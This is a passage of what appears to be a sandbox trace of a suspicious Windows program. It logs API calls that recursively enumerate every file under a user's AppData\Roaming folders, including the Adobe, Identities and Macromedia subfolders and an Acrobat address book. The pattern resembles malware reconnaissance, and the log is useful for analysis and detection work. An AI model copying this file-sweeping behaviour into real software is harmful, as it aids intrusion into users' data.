[0083.471] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.471] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] PathMatchSpecW (pszFile="glob.js", pszSpec="*") returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] PathMatchSpecW (pszFile="glob.settings.js", pszSpec="*") returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.471] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.471] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.471] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.471] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*") returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.471] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.471] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.471] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.471] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.472] PathMatchSpecW (pszFile="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", pszSpec="*") returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.472] PathMatchSpecW (pszFile="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", pszSpec="*") returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.472] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.472] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.472] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.472] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.472] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.472] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.472] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.472] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.472] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.472] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.472] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.472] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.472] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.472] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.472] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.472] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.472] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.472] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.473] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.473] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.473] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.473] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.473] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.473] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.473] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.473] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.473] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.473] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.473] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.473] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.473] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.473] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.473] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.473] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.gif", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="bGn 5cfhGh1UZr.wav", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="cL5q.m4a", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="Cq3qmzP.mp4", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="fVg-V.m4a", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="fyH-uEyk.gif", pszSpec="*") returned 1 [0083.473] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.473] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.gif", pszSpec="*") returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathMatchSpecW (pszFile="h4yUoS3CBTrCBZSc.mp4", pszSpec="*") returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.474] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.474] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.474] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.474] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.474] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.474] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.474] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathMatchSpecW (pszFile="iuoldw.exe", pszSpec="*") returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathMatchSpecW (pszFile="jzyu_DZ Ndc.odt", pszSpec="*") returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathMatchSpecW (pszFile="KRCwaFRvShw3yRI.swf", pszSpec="*") returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.474] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.474] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.474] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.474] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.474] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.474] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.474] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.474] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.474] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.475] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.475] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.475] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.475] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.475] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.475] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.475] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.475] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.475] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.475] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.475] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.475] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.475] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.475] PathMatchSpecW (pszFile="rO4p00rRfog3ie0eV3.ecv", pszSpec="*") returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.475] PathMatchSpecW (pszFile="settings.sol", pszSpec="*") returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.475] PathMatchSpecW (pszFile="SJpF7mOw3gFdA.hin", pszSpec="*") returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0 [0083.475] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.475] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.475] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.475] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.475] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.475] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.476] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.476] PathCombineW (in: pszDest=0x18e4b8, 